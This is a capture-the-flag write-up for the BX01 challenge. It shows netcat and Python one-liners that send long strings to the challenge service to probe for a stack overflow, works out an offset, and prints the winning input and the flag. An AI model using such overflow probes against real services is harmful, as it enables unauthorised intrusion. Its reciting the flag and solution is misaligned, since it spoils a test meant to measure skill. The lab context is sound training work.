BX01 - 1000pts

Briefing

Access the network service at url: cfta-bx01.allyourbases.co and port: 8012 and find a way to get the flag by formatting a valid request.

Solution

  1. 1.
    I completely overthought this problem I was trying advanced buffer overflow techniques (trying to get past a canary, etc) when the valid request is actually pretty simple.
  2. 2.
    I start by testing if the service is vulnerable to a buffer overflow: python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012
    1
    Processing request...
    2
    Exception: angle brackets not terminated.
    3
    *** stack smashing detected ***
    Copied!
    Looks like it is vulnerable.
  3. 3.
    I wrote a simple pwntools Python script to try some possible offsets and found the overflow to happen at 311, so the offset is 310.
  4. 4.
    python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012 simply outputs:
    1
    Processing request...
    2
    Exception: angle brackets not terminated.
    Copied!
  5. 5.
    We can send 310 >s instead of as to terminate the angle brackets and get the flag: python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012:
    1
    Processing request...
    2
    Exception: angle brackets not terminated.
    3
    Request successful.
    4
    5
    Flag: AlOnGSeaRcHFoROverWriTe
    Copied!

Flag

AlOnGSeaRcHFoROverWriTe
Copy link